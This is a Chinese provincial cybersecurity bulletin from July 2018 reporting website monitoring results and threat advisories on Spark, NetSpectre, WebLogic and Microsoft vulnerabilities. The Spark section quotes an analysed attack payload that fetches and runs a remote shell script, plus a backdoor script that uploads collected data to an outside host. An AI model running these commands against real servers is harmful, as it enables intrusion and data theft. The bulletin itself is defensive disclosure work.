网络安全监测工作动态 2018 第 5 期 ( 总第 5 期 ) 陕西省网络与信息安全测评中心 7 月 1 日 -7 月 31 日 本月, 陕西省网络与信息安全测评中心 ( 以下简称 测评中心 ) 对受委托的 759 个政府网站进行了安全监测, 共发现无法正常访问的政府网站 4 个, 被恶意篡改的政

Size: px
Start display at page:

Download "网络安全监测工作动态 2018 第 5 期 ( 总第 5 期 ) 陕西省网络与信息安全测评中心 7 月 1 日 -7 月 31 日 本月, 陕西省网络与信息安全测评中心 ( 以下简称 测评中心 ) 对受委托的 759 个政府网站进行了安全监测, 共发现无法正常访问的政府网站 4 个, 被恶意篡改的政"

Transcription

1 网络安全监测工作动态 2018 第 5 期 ( 总第 5 期 ) 陕西省网络与信息安全测评中心 7 月 1 日 -7 月 31 日 本月, 陕西省网络与信息安全测评中心 ( 以下简称 测评中心 ) 对受委托的 759 个政府网站进行了安全监测, 共发现无法正常访问的政府网站 4 个, 被恶意篡改的政府网站 7 个, 存在严重高危漏洞的政府网站 18 个 从安全防御情况来看, 目前针对我省政府网站的攻击主要来自于北京 江苏 四川等省市, 总攻击次数为 万次, 攻击手法主要为 CC 攻击 恶意扫描 XSS 攻击等 一 安全监测情况分析 ( 一 ) 可用性监测情况共监测发现 4 个网站存在无法访问情况, 主要集中在各市级政府网站, 主要原因有 : 网站域名解析错误 ; 网站程序设计不合理, 有过度消耗主机资源的操作发生 ; 网站存在安全隐患, 被他人恶意攻击等 ( 二 ) 安全事件监测情况共监测发现 7 个网站被恶意篡改, 主要集中在市级政府部门网站, 篡改主要分为页面篡改和暗链两种形式, 其中 4 个网站被黑客攻击, 将网站页面指向博彩网站 ;3 个网站被黑客插入了隐形恶意链接, 链接类型主要为广告 博彩等 1

2 ( 三 ) 安全漏洞检测情况共发现 18 个网站存在高危漏洞, 高危漏洞数量 18 个 主要集中在市级以下政府 事业单位网站, 漏洞类型主要为 SQL 注入 弱口令 下载漏洞 代码执行 越权访问等 二 安全防御情况分析 ( 一 ) 攻击源分析经分析统计, 网站受到的总攻击次数为 万次, 其中, 北京 江苏 四川三个省市位居前三 从攻击源分布情况看, 目前针对我省政府网站攻击主要集中在北京 江苏 四川 香港 河南 浙江和安徽等 ( 如图 1) 广东北京江苏上海福建浙江山东香港河南湖南四川陕西湖北吉林安徽 图 1 攻击源攻击次数分布情况 ( 二 ) 攻击类型分析经分析统计, 网站攻击最常见的攻击类型为 CC 攻击和恶意扫描, 攻击者共发起了 万次 CC 攻击和

3 万次恶意扫描, 所有攻击类型及数量的主要分布情况如图 图 2 网站恶意攻击类型及数量分布三 威胁播报 ( 一 ) 首个 Spark REST API 未授权漏洞利用分析 2018 年 7 月 7 日, 阿里云安全首次捕获 Spark REST API 的未授权 RCE 漏洞进行攻击的真实样本 7 月 9 号起, 阿里云平台已能默认防御此漏洞的大规模利用 这是首次在真实攻击中发现使用 暗网 来传播恶意后门的样本, 预计未来这一趋势会逐步扩大 目前全网约 5000 台 Spark 服务器受此漏洞影响 阿里云安全监控到该类型的攻击还处于小范围尝试阶段, 需要谨防后续的规模性爆发 建议受影响客户参考章节三的修复建议进行修复 1 漏洞详情说明 Apache Spark 是专为大规模数据处理而设计的快速通用的计算引擎, 是 UC Berkeley AMP lab( 加州大学伯克利分 3

4 校的 AMP 实验室 ) 所开源的类 Hadoop MapReduce 的通用并行框架 为了让使用者能够方便的控制系统进行计算和查看任务结果,Spark 也提供了 WEB UI 图形化界面和相应的 REST API 来方便用户操作 Spark 作为大数据时代的 计算引擎, 一旦被攻破, 企业的核心数据资产 计算能力 用户敏感数据都将被攻击者窃取 ; 更进一步的, 由于 Spark 自身的分布式特性, 一个攻击点的攻破可能导致整个集群的沦陷 Spark 权限设置不当, 可能导致攻击者无需认证即可通过该 REST API 来操作 Spark 创建任务 删除任务 查看任务结果等, 从而最终获得执行任意指令的能力 我们还原了攻击者的攻击步骤 : 1) 攻击者通过 web 扫描的方式发现了一台 Spark webui 服务 2) 构造攻击指令, 并通过 6066 端口发送到该服务器的 REST API POST /v1/submissions/create host:xxxx.xxx.xx:6066 { action : CreateSubmissionRequest, cli entsparkversion : 2.1.0, appargs : [ curl x.x.x.x/y.sh sh ], appresource : onion.plus/simpleapp.jar, environmentvariables : 4

5 { SPARK_ENV_LOADED : 1 }, mainclass : S impleapp, sparkproperties : { spark.jars : spa rk.driver.supervise : false, spark.app.name : SimpleApp, spark.eventlog.enabled : false, spark.submit.deploymode : cluster, spark.m aster : spark://x.x.x.x:6066 } } 该攻击 payload 指示服务器远程下载 x.onion.plus/simpleapp.jar, 并执行攻击者指定的任意方法, 该攻击者还通过洋葱网络来隐藏自己的相关信息 3) 对该 jar 包进行逆向分析, 该 jar 包即是一个简单的执行命令的后门, 执行 jar 包时,Spark 服务器将会从洋葱网络中下载一段 shell 脚本并执行 4) 脚本内容如下 : #!/bin/bash ps ax sort=-pcpu > /tmp/tmp.txt curl -F file=@/tmp/tmp.txt e.php rm -rf /tmp/tmp.txt 该脚本只是简单的将性能信息打印并回传, 暂未进行进一步的攻击 2 漏洞影响与变化态势 5

6 目前全网监控, 开放了 8080 端口暴露在公网的 Spark 机器共有 5000 台左右, 黑客可批量接管其中存在权限问题的机器 在此之前, 阿里云安全团队曾针对分布式计算系统相关的漏洞进行过预警 ( 详见 : 黑客利用 Hadoop Yarn 资源管理系统未授权访问漏洞进行攻 /) 这两个漏洞原理和利用方法非常相似, 这也佐证了之前的预判 随着加密货币经济的进一步繁荣, 具有强大算力, 但是较弱安全能力的分布式应用将面临更多的漏洞利用和黑客攻击 由于 Hadoop Yarn 未授权漏洞在全网已经成为了黑客挖矿的一种重要手法, 我们有理由相信 Spark REST API 漏洞也将很快被黑产利用 3 安全专家建议建议通过 iptables 或者安全组配置访问策略, 限制对 等端口的访问 ; 并且如无必要, 不要将接口开放在公网, 改为本地或者内网调用 ; 建议使用 Spark 的 yarn 控制模式, 并且开启 HTTP Ker beros 对 WEB UI 进行访问控制 ; 如采用 Spark standalone 6

7 模式, 需要自行实现访问控制的 jar 包, 并设置 spark.ui. filters 对 WEB UI 进行访问控制 ( 详见 : ache.org/docs/latest/configuration.html#security) [ 来源 : 安全牛 ] ( 二 )NetSpectre 可利用芯片安全漏洞远程盗取信息如今, 名为 网络幽灵 (NetSpectre) 的新变种无需在目标主机上执行漏洞利用代码, 便可盗取网络中另一台设备上的隐私信息, 尽管渗漏得非常慢 数十亿计算机和各种设备都不同程度地笼罩在数据泄露风险之下 理论上, 与执行可利用代码段的服务建立网络连接, 便足以非常缓慢地远程探知该应用内存中的数据 这需要精确定时和不断衡量修正, 所以, 嘈杂的网络环境, 比如互联网, 就会一定程度上妨碍漏洞利用 这还只是第一阶段 下一步是要拉取感兴趣的数据而不仅仅是随便抓些临时变量和程序内存中其他无关紧要的东西 这一步可没那么简单 我们证明了幽灵攻击未必需要本地代码执行, 还可以远程加载 而且, 利用新的秘密信道, 幽灵甚至不一定需要缓存来泄露数据 题为 网络幽灵 : 通过网络读取任意内存 的论文写道 : 该边信道攻击每小时仅能泄露 15 个比特, 或者通过基于 AVX 的隐秘信道每小时渗漏 60 比特 也就是说, 像是加密密钥或 7

8 身份验证令牌之类的秘密数据可能需要数日才可以查找收集到 高价值目标这一数据泄露方法应引起人们的警惕, 尽管数据渗漏速度可能是个限制因素 速度上的限制, 让该攻击仅对执行高价值目标针对性攻击的黑客比较有吸引力, 这是广大普通用户的福音 而只要目标系统打全了幽灵补丁, 包括这最新变种的补丁, 就可以阻止该攻击 但幽灵系攻击变幻莫测, 安全界对它的认知也还很粗浅, 该问题解决起来并不是那么简单 幽灵攻击利用现代 CPU 预测执行引擎所用的分支预测机制, 来迫使目标进程以可泄露秘密数据的方式访问内存 现代处理器靠预测执行机制来高速运行软件, 它们预测程序流的走向, 提前准备好所需代码和数据 通过操作和观察该预测执行的效果, 是有可能识别出内存中本不应暴露出的数据的 远程幽灵攻击中, 目标设备需含有执行特定操作的代码, 比如循环读取数组且每次读取都检查一遍数组边界 该漏洞利用方法滥用了处理器微架构中引入预测执行的设计决策, 并由此辨别出内存中的内容 设计出该攻击的研究人员将这些执行特定操作的代码段称作 幽灵小工具 与本地幽灵攻击类似, 远程幽灵攻击也要求目标代码中 8

9 存在 幽灵小工具 在公开网络接口或 API 中含有所需 幽灵小工具 的系统, 就可遭该远程幽灵攻击, 导致任意内存被黑客通过网络读取 攻击者仅仅是向受害者发送一系列精心编制的请求, 然后测量响应时间, 就可以从受害者的内存中漏出秘密数据 该攻击会向目标发送多个网络数据包, 包中含有总是处于条件语句比较判断边界之内的值, 借之将分支预测器训练到预计该条件判断语句的结果是真 不要越界举个例子, 假定下列代码在带漏洞设备上执行 : if (x < bitstream_length) if(bitstream[x]) flag = true; 黑客可尝试利用 bitstream[x] 访问, 从该软件私有内存中抽取 1 比特数据 攻击者发送 x 落在边界外的一个数据包, 那 bitstream[x] 就是目标内存中的一个秘密比特了 分支预测器会假定边界检查结果为真, 该内存访问得到预测执行 研究人员在今年早些时候就将自己的发现通报给了英特尔, 但英特尔似乎并不是太惊恐 基本上, 只要你已经更新了代码和应用以缓解之前的幽灵漏洞利用, 那网络幽灵也骚扰不到你 9

10 网络幽灵是边界检查绕过 (CVE ) 漏洞的一个应用, 而通过软件代码检查与修改, 可以确保预测停止屏障矗立在合适的地方, 也就缓解了此类漏洞利用 英特尔表示, 已在 分析潜在边界检查绕过漏洞 白皮书中加入了相关信息, 并致谢报告了该信息的研究人员 Red Hat 则称其一直在与研究人员合作, 并在 27 号发布的博客文章中公布了该漏洞对其产品的影响情况 Red Hat 首席 Arm 架构师兼计算机微架构主管表示 : 我们未在用户空间发现任何可行的幽灵小工具攻击, 但我们仍在积极审计通过网络监听的所有守护进程及其他技术栈 截至目前, 就像其他幽灵与熔断变种及亚变种一样, 并未发现有恶意软件在利用这些漏洞 [ 来源 : 安全牛 ] ( 三 ) 关于 Oracle WebLogic Server 存在反序列化远程代码执行漏洞的安全公告 2018 年 7 月 18 日, 国家信息安全漏洞共享平台 (CNVD) 收录了 Oracle WebLogic Server 反序列化远程代码执行漏洞 (CNVD , 对应 CVE ) 攻击者利用该漏洞, 可在未授权的情况下远程执行代码 目前厂商已发布补丁进行修复 1 漏洞情况分析 WebLogic Server 是美国甲骨文 (Oracle) 公司开发的一款适用于云环境和传统环境的应用服务中间件, 它提供了 10

11 一个现代轻型开发平台, 支持应用从开发到生产的整个生命周期管理, 并简化了应用的部署和管理 RMI 目前使用 Java 远程消息交换协议 JRMP(Java Remote Messaging Protocol) 进行通信,JRMP 协议是专为 Java 的远程对象制定的协议 在 WebLogic Server 的 RMI( 远程方法调用 ) 通信中,T3 协议 ( 丰富套接字 ) 用来在 WebLogic Server 和其他 Java 程序 ( 包括客户端及其他 WebLogic Server 实例 ) 间传输数据, 该协议在开放 WebLogic 控制台端口的应用上默认开启 由于在 WebLogic 中,T3 协议和 Web 协议共用同一个端口, 因此只要能访问 WebLogic 就可利用 T3 协议, 将 payload 发送至目标服务器 北京时间 7 月 18 日凌晨,Oracle 官方发布了 7 月份关键补丁更新 CPU(Critical Patch Update), 其中修复了一个在 4 月份 CPU 补丁中未能完全修复的 Weblogic Server 反序列化漏洞 (CNVD ,CVE ) 该漏洞通过 JRMP 协议利用 RMI 机制的缺陷达到执行任意反序列化代码的目的 攻击者可以在未授权的情况下将 payload 封装在 T3 协议中, 通过对 T3 协议中的 payload 进行反序列化, 从而实现对存在漏洞的 WebLogic 组件进行远程攻击, 执行任意代码并可获取目标系统的所有权限 CNVD 对该漏洞的综合评级为 高危 2 漏洞影响范围 11

12 根据官方公告情况, 该漏洞的影响版本如下 : WebLogic WebLogic WebLogic WebLogic CNVD 秘书处对 WebLogic 服务在全球范围内的分布情况进行了统计, 结果显示该服务的全球规模约为 6.9 万, 其中我国境内的用户量约为 2.15 万 随机抽样检测结果显示, 约 0.4% 的 WebLogic 服务器受此漏洞影响 该比例远低于我平台在 4 月 18 日收录的 WebLogic Server 反序列化漏洞 (CNVD ) 的影响范围 3 漏洞处置建议 1) 美国甲骨文公司已发布了修复补丁, 建议及时更新至最新版本 : -advisory/cpujul html 2) 临时解决方案 : 控制 T3 协议的访问此漏洞产生于 WebLogic 的 T3 服务, 因此可通过控制 T3 协议的访问来临时阻断针对该漏洞的攻击 当开放 WebLogic 控制台端口 ( 默认为 7001 端口 ) 时,T3 服务会默认开启 具体操作 : 1 进入 WebLogic 控制台, 在 base_domain 的配置页面中, 进入 安全 选项卡页面, 点击 筛选器, 进入连接筛 12

13 选器配置 2 在连接筛选器中输入 :weblogic.security.net.conn ectionfilterimpl, 在连接筛选器规则中输入 : * * allow t3 t3s, /0 * * deny t3 t3s(t3 和 t3 s 协议的所有端口只允许本地访问 ) 3 保存后需重新启动, 规则方可生效 3) 升级到 jdk-8u20 以上的版本 [ 来源 : 国家互联网应急中心 ] ( 四 )CNNVD 关于微软多个远程代码执行漏洞的通报 近日, 微软官方发布了多个远程代码执行漏洞的公告, 包括 Microsoft Access 远程执行代码执行漏洞 PowerShell 编辑器服务远程执行代码漏洞等 8 个漏洞 成功利用上述远程代码执行漏洞的攻击者, 可以在目标系统上执行任意代码 微软多个产品和系统受漏洞影响 目前, 微软官方已经发布补丁修复了上述漏洞, 建议用户及时确认是否受到漏洞影响, 尽快采取修补措施 1 漏洞介绍 Microsoft Windows 是美国微软公司研发的一套采用了图形化模式的操作系统 Microsoft Access PowerShell 编辑器 Skype For Business Lync Microsoft SharePoin t.net Framework Visual Studio 等是其重要组成部分, 13

14 主要于日常办公 7 月 10 日晚, 微软发布了 8 个远程代码执 行漏洞 ( 详见表 1), 攻击者利用相关漏洞, 可以在目标系统 上执行任意代码 表 1 Windows 远程代码执行漏洞列表 序号漏洞名称漏洞编号漏洞简介 1 Microsoft Access 远程 代码执行漏洞 2 PowerShell 编辑器服务远 程执行代码漏 洞 3 Skype For Business 和 Lync 远程执行 代码漏洞 CNNVD CVE CNNVD CVE CNNVD CVE 当 Microsoft Access 无法正确处 理内存中的对象时, 将触发远程代 码执行漏洞 成功利用此漏洞的攻 击者可以控制受影响的系统 攻击 者可在目标系统上安装程序, 查看 更改或删除数据, 或者创建管理员 账号 帐户权限小的用户受到的影 响更小 PowerShell 编辑器服务中存在远程代码执行漏洞 成功利用此漏洞的攻击者可以在目标系统上执行恶意代码 攻击者可能会在 PowerShell 编辑器服务进程中插入恶意代码 当 Skype for Business 和 Microsoft Lync 客户端无法正确 处理经特殊设计的内容时, 将触发 远程代码执行漏洞 此漏洞可能以 一种允许攻击者在当前用户的上下 文中执行任意代码的方式损坏内 存 成功利用该漏洞的攻击者可以 获得与当前用户相同的用户权限 如果当前用户使用管理员权限登 录, 那么攻击者便可控制受影响的 系统 攻击者可随后安装程序 ; 查 14

15 4 Microsoft SharePoint 远程执行代码漏洞 5 脚本引擎内存损坏漏洞 6.NET Framework 远程代码注入漏洞 7.NET Framework 远程代码注入漏洞 CNNVD CVE CNNVD CVE CNNVD CVE CNNVD CVE 看 更改或删除数据 ; 或者创建管理员帐户 当软件无法检查应用程序包的源标记时, 将触发 Microsoft SharePoint 远程代码执行漏洞 成功利用此漏洞的攻击者可以在 SharePoint 应用程序池和 SharePoint 服务器中执行任意代码 脚本引擎在 Microsoft 浏览器中处理内存中对象的方式中存在远程代码执行漏洞 该漏洞可以在当前用户的上下文中执行任意代码从而损坏内存 成功利用该漏洞的攻击者可以获得与当前用户相同的用户权限 如果当前用户使用管理员权限登录, 成功利用此漏洞的攻击者便可控制受影响的系统 攻击者可随后安装程序, 查看 更改或删除数据, 或者创建管理员帐户 当 Microsoft.NET Framework 未能正确验证输入时, 存在远程代码执行漏洞 成功利用此漏洞的攻击者可以控制受影响的系统 攻击者可随后安装程序, 查看 更改或删除数据, 或者创建管理员帐户 当软件无法检查文件的源标记时, 将触发.NET 远程代码执行漏洞 成功利用此漏洞的攻击者可以在当前用户的上下文中运行任意代码 如 15

16 8 Visual Studio 远程执行代码漏洞 2 修复建议 CNNVD CVE 果当前用户使用管理员权限登录, 那么攻击者就可以控制受影响的系统 攻击者可随后安装程序, 查看 更改或删除数据, 或者创建管理员帐户 当软件未检查未构建项目的文件的源标记时, 将触发 Visual Studio 远程代码执行漏洞 成功利用此漏洞的攻击者可以在当前用户的上下文中运行任意代码 如果当前用户使用管理员权限登录, 那么攻击者就可以控制受影响的系统 攻击者可随后安装程序, 查看 更改或删除数据, 或者创建管理员帐户 目前, 微软官方已经发布补丁修复了上述漏洞, 建议用户及时确认是否受到漏洞影响, 尽快采取修补措施 微软官方链接地址如下 : 序号漏洞名称官方链接 1 Microsoft Access 远程代码执行漏洞 (CNNVD CVE ) 2 PowerShell 编辑器服务远程执行代码漏洞 cn/security-guidance/advisory/cve- cn/security-guidance/advisory/cve ( CNNVD CVE ) 3 Skype For Business 和 16

17 Lync 远程执行代码漏洞 ( CNNVD CVE ) 4 Microsoft SharePoint 远程执行代码漏洞 ( CNNVD CVE ) 5 脚本引擎内存损坏漏洞 ( CNNVD CVE ) 6.NET Framework 远程代码注入漏洞 (CNNVD CVE ) 7.NET Framework 远程代码注入漏洞 (CNNVD CVE ) cn/security-guidance/advisory/cve cn/security-guidance/advisory/cve cn/security-guidance/advisory/cve cn/security-guidance/advisory/cve cn/security-guidance/advisory/cve Visual Studio 远程执行代码漏洞 cn/security-guidance/advisory/cve ( CNNVD CVE ) [ 来源 : 国家信息安全漏洞库 ] 四 联系我们欢迎与我们就 网络安全监测工作动态 进行交流 17

18 本期编辑 : 王楠 赵少飞 联系电话 : 邮箱地址 : wangnan@sntec.org.cn 网 址 : 18

信息安全漏洞周报 (2018 年第 36 期总第 440 期 ) 信息安全测评中心 2018 年 9 月 16 日 根据国家信息安全漏洞库 (CNNVD) 统计, 本周 (2018 年 9 月 10 日至 2018 年 9 月 16 日 ) 安全漏洞情况如下 : 公开漏洞情况 7.99% 本周 CN

信息安全漏洞周报 (2018 年第 36 期总第 440 期 ) 信息安全测评中心 2018 年 9 月 16 日 根据国家信息安全漏洞库 (CNNVD) 统计, 本周 (2018 年 9 月 10 日至 2018 年 9 月 16 日 ) 安全漏洞情况如下 : 公开漏洞情况 7.99% 本周 CN 信息安全漏洞周报 (2018 年第 36 期总第 440 期 ) 信息安全测评中心 2018 年 9 月 16 日 根据国家信息安全漏洞库 (CNNVD) 统计, 本周 (2018 年 9 月 10 日至 2018 年 9 月 16 日 ) 安全漏洞情况如下 : 公开漏洞情况 7.99% 本周 CNNVD 采集安全漏洞 356 个, 与上周 (338 个 ) 相比增加了 接报漏洞情况 本周接报漏洞

More information

课程标题

课程标题 微软月度信息安全公告 2013 年 10 月 苏鹏 特约讲师 议程 安全公告 MS13-080~MS13-087 问与答 2013 年 10 月安全公告概述 新发布的安全公告 严重级 MS12-080~083 重要级 MS12-084~087 MSRC 通告安全等级 Microsoft Security Response Center (MSRC) 使用严重程度等级来帮助确定漏洞及相关的软件更新紧急性

More information

目录漏洞态势 公开漏洞情况... 4 漏洞增长概况... 4 漏洞分布情况 漏洞厂商分布 漏洞产品分布 漏洞类型分布 漏洞危害等级分布... 7 漏洞修复情况 整体

目录漏洞态势 公开漏洞情况... 4 漏洞增长概况... 4 漏洞分布情况 漏洞厂商分布 漏洞产品分布 漏洞类型分布 漏洞危害等级分布... 7 漏洞修复情况 整体 北京师范大学网络信息安全通告 2018 年 10 月报告 北京师范大学信息网络中心 2018 年 11 月 目录漏洞态势... 3 1. 公开漏洞情况... 4 漏洞增长概况... 4 漏洞分布情况... 4 1.2.1. 漏洞厂商分布... 4 1.2.2. 漏洞产品分布... 5 1.2.3. 漏洞类型分布... 6 1.2.4. 漏洞危害等级分布... 7 漏洞修复情况... 7 1.3.1.

More information

信息安全漏洞周报 (2018 年第 48 期总第 452 期 ) 信息安全测评中心 2018 年 12 月 16 日 根据国家信息安全漏洞库 (CNNVD) 统计, 本周 (2018 年 12 月 10 日至 2018 年 12 月 16 日 ) 安全漏洞情况如下 : 公开漏洞情况 本周 CNNVD

信息安全漏洞周报 (2018 年第 48 期总第 452 期 ) 信息安全测评中心 2018 年 12 月 16 日 根据国家信息安全漏洞库 (CNNVD) 统计, 本周 (2018 年 12 月 10 日至 2018 年 12 月 16 日 ) 安全漏洞情况如下 : 公开漏洞情况 本周 CNNVD 信息安全漏洞周报 (2018 年第 48 期总第 452 期 ) 信息安全测评中心 2018 年 12 月 16 日 根据国家信息安全漏洞库 (CNNVD) 统计, 本周 (2018 年 12 月 10 日至 2018 年 12 月 16 日 ) 安全漏洞情况如下 : 公开漏洞情况 本周 CNNVD 采集安全漏洞 427 个, 与上周 (278 个 ) 相比增加了 53.60% 接报漏洞情况 本周接报漏洞

More information

课程标题

课程标题 微软月度信息安全公告 2013 年 12 月 苏鹏 特约讲师 议程 安全公告 MS13-088~MS13-095 问与答 2013 年 12 月安全公告概述 新发布的安全公告 严重级 MS13-096,097,098,099,105 重要级 MS13-100,101,102,103,104,106 MSRC 通告安全等级 Microsoft Security Response Center (MSRC)

More information

北京师范大学网络信息安全通告 北京师范大学网络信息安全通告 2019 年 2 月报告 北京师范大学信息网络中心 2019 年 3 月

北京师范大学网络信息安全通告 北京师范大学网络信息安全通告 2019 年 2 月报告 北京师范大学信息网络中心 2019 年 3 月 2019 年 2 月报告 北京师范大学信息网络中心 2019 年 3 月 目录 漏洞态势... 3 1. 公开漏洞情况... 4 漏洞分布情况... 5 1.2.1. 漏洞厂商分布... 5 1.2.2. 漏洞产品分布... 5 1.2.3. 漏洞类型分布... 6 1.2.4. 漏洞危害等级分布... 7 1.3.1. 整体修复情况... 8 1.3.2. 厂商修复情况... 9 1.4.1. 超危漏洞实例...

More information

北京师范大学网络信息安全通告 北京师范大学网络信息安全通告 2019 年 3 月报告 北京师范大学信息网络中心 2019 年 4 月

北京师范大学网络信息安全通告 北京师范大学网络信息安全通告 2019 年 3 月报告 北京师范大学信息网络中心 2019 年 4 月 2019 年 3 月报告 北京师范大学信息网络中心 2019 年 4 月 目录 漏洞态势... 3 1. 公开漏洞情况... 4 漏洞增长概况... 4 漏洞分布情况... 5 1.2.1. 漏洞厂商分布... 5 1.2.2. 漏洞产品分布... 5 1.2.3. 漏洞类型分布... 6 1.2.4. 漏洞危害等级分布... 7 1.3.1. 整体修复情况... 8 1.3.2. 厂商修复情况...

More information

职 位 类 别 : 测 试 工 程 师 工 作 经 验 或 实 习 经 历 : 不 限 岗 位 要 求 : 1. 本 科 及 其 以 上 学 历, 计 算 机 相 关 专 业 2014 届 毕 业 生 ; 2. 实 习 时 间 要 求, 尽 量 一 周 五 个 工 作 日 ; 3. 熟 悉 Wind

职 位 类 别 : 测 试 工 程 师 工 作 经 验 或 实 习 经 历 : 不 限 岗 位 要 求 : 1. 本 科 及 其 以 上 学 历, 计 算 机 相 关 专 业 2014 届 毕 业 生 ; 2. 实 习 时 间 要 求, 尽 量 一 周 五 个 工 作 日 ; 3. 熟 悉 Wind 企 业 信 息 表 公 司 名 称 : 中 铁 信 安 ( 北 京 ) 信 息 安 全 技 术 有 限 公 司 公 司 性 质 : 国 企 控 股 公 司 规 模 : 100 人 左 右 所 属 行 业 : 互 联 网 计 算 机 软 件 招 聘 人 数 :12 工 作 地 点 : 北 京 市 海 淀 区 公 司 能 够 提 供 的 福 利 : 五 险 一 金 晋 升 旅 游 节 假 日 礼 物 加

More information

信息安全漏洞周报 (2018 年第 26 期总第 430 期 ) 信息安全测评中心 2018 年 7 月 8 日 根据国家信息安全漏洞库 (CNNVD) 统计, 本周 (2018 年 7 月 2 日至 2018 年 7 月 8 日 ) 安全漏洞情况如下 : 公开漏洞情况 5.74% 本周 CNNVD

信息安全漏洞周报 (2018 年第 26 期总第 430 期 ) 信息安全测评中心 2018 年 7 月 8 日 根据国家信息安全漏洞库 (CNNVD) 统计, 本周 (2018 年 7 月 2 日至 2018 年 7 月 8 日 ) 安全漏洞情况如下 : 公开漏洞情况 5.74% 本周 CNNVD 信息安全漏洞周报 (2018 年第 26 期总第 430 期 ) 信息安全测评中心 2018 年 7 月 8 日 根据国家信息安全漏洞库 (CNNVD) 统计, 本周 (2018 年 7 月 2 日至 2018 年 7 月 8 日 ) 安全漏洞情况如下 : 公开漏洞情况 5.74% 本周 CNNVD 采集安全漏洞 279 个, 与上周 (296 个 ) 相比减少了 接报漏洞情况 本周接报漏洞 150

More information

本 课 程 作 为 非 计 算 机 专 业 本 科 通 识 课 程, 是 一 门 理 论 和 实 践 紧 密 结 合 的 实 用 课 程, 内 容 包 括 计 算 机 基 础 部 分 和 程 序 设 计 部 分 计 算 机 基 础 部 分 涵 盖 计 算 机 软 硬 件 组 成 数 制 表 示 操

本 课 程 作 为 非 计 算 机 专 业 本 科 通 识 课 程, 是 一 门 理 论 和 实 践 紧 密 结 合 的 实 用 课 程, 内 容 包 括 计 算 机 基 础 部 分 和 程 序 设 计 部 分 计 算 机 基 础 部 分 涵 盖 计 算 机 软 硬 件 组 成 数 制 表 示 操 计 算 机 基 础 部 程 序 设 计 类 课 程 介 绍 1. Java 语 言 程 序 设 计 Java 简 介 Java 是 一 种 开 放 的 可 以 撰 写 跨 平 台 应 用 程 序 的 面 向 对 象 的 程 序 设 计 语 言 Java 技 术 具 有 卓 越 的 通 用 性 高 效 性 平 台 移 植 性 和 安 全 性, 广 泛 应 用 于 PC 数 据 中 心 科 学 超 级

More information

MASQUERADE # iptables -t nat -A POSTROUTING -s / o eth0 -j # sysctl net.ipv4.ip_forward=1 # iptables -P FORWARD DROP #

MASQUERADE # iptables -t nat -A POSTROUTING -s / o eth0 -j # sysctl net.ipv4.ip_forward=1 # iptables -P FORWARD DROP # iptables 默认安全规则脚本 一 #nat 路由器 ( 一 ) 允许路由 # iptables -A FORWARD -i eth0 -o eth1 -j ACCEPT ( 二 ) DNAT 与端口转发 1 启用 DNAT 转发 # iptables -t nat -A PREROUTING -p tcp -d 192.168.102.37 dprot 422 -j DNAT to-destination

More information

Azure_s

Azure_s Azure ? Azure Azure Windows Server Database Server Azure Azure Azure Azure Azure Azure Azure Azure OpenSource Azure IaaS Azure VM Windows Server Linux PaaS Azure ASP.NET PHP Node.js Python MS SQL MySQL

More information

Microsoft Word - 13院21号.doc

Microsoft Word - 13院21号.doc 川 教 考 院 2013 21 号 四 川 省 教 育 考 试 院 关 于 全 国 计 算 机 等 级 考 试 体 系 调 整 的 通 知 各 NCRE 考 点 : 为 进 一 步 适 应 新 时 期 计 算 机 应 用 技 术 的 发 展 和 人 才 市 场 需 求 的 变 化, 确 保 全 国 计 算 机 等 级 考 试 ( 以 下 简 称 NCRE) 健 康 持 续 发 展, 教 育 部 考

More information

大连软~1

大连软~1 大 连 软 件 职 业 学 院 高 等 职 业 教 育 质 量 年 度 报 告 ( ) 二 〇 一 六 年 一 月 ( 二 学 2...4 大 连 软 件 职 业 学 院 高 等 职 业 教 育 质 量 报 告 (2015)...4 目 录 一 学 院 基 本 情 况 二 办 学 基 本 信...8...6...7 息 ( 一 ) 明 确 办 学 思 路, 科 学 谋 划 发 展 战 略 ( 二 )

More information

爱玩科技合作白皮书(2011)

爱玩科技合作白皮书(2011) 爱 玩 科 技 合 作 白 皮 书 一 公 司 简 介 深 圳 市 爱 玩 科 技 有 限 公 司 ( 以 下 简 称 爱 玩 科 技 ), 坐 落 于 高 新 技 术 产 业 云 集 的 深 圳 市 高 新 技 术 产 业 园 赛 百 诺 大 厦 内, 是 一 家 集 网 络 棋 牌 游 戏 休 闲 游 戏 手 机 游 戏 研 发 运 营 于 一 体 的 新 兴 高 科 技 软 件 公 司 爱 玩

More information

水晶分析师

水晶分析师 大数据时代的挑战 产品定位 体系架构 功能特点 大数据处理平台 行业大数据应用 IT 基础设施 数据源 Hadoop Yarn 终端 统一管理和监控中心(Deploy,Configure,monitor,Manage) Master Servers TRS CRYSTAL MPP Flat Files Applications&DBs ETL&DI Products 技术指标 1 TRS

More information

天津天狮学院关于修订2014级本科培养方案的指导意见

天津天狮学院关于修订2014级本科培养方案的指导意见 目 录 天 津 天 狮 院 关 于 修 订 2014 级 本 科 培 养 方 案 的 指 导 意 见...1 金 融 类 专 业...9 金 融 专 业 培 养 方 案...9 保 险 专 业 培 养 方 案...14 人 力 资 源 管 理 专 业 培 养 方 案...19 劳 动 与 社 会 保 障 专 业 培 养 方 案...24 工 商 管 理 类 专 业...29 市 场 营 销 专 业

More information

Microsoft Word - 11900電腦軟體設計.doc

Microsoft Word - 11900電腦軟體設計.doc 技 能 檢 定 規 範 之 一 一 九 電 腦 軟 體 行 政 院 勞 工 委 員 會 職 業 訓 練 局 編 印 軟 體 技 術 士 技 能 檢 定 規 範 目 錄 一 軟 體 技 術 士 技 能 檢 定 規 範 說 明... 1 二 丙 級 軟 體 技 術 士 技 能 檢 定 規 範... 3 三 乙 級 軟 體 技 術 士 技 能 檢 定 規 範... 5 四 甲 級 軟 體 技 術 士 技

More information

目 录 1 本周漏洞通告 漏洞一 :NSFOCUS RSAS V6.0 存在命令注入漏洞 漏洞二 :SEMCMS 外贸网站 PHP 多语言版 V2.7 存在 SQL 注入漏洞 漏洞三 :Oracle JD Edwards EnterpriseOne

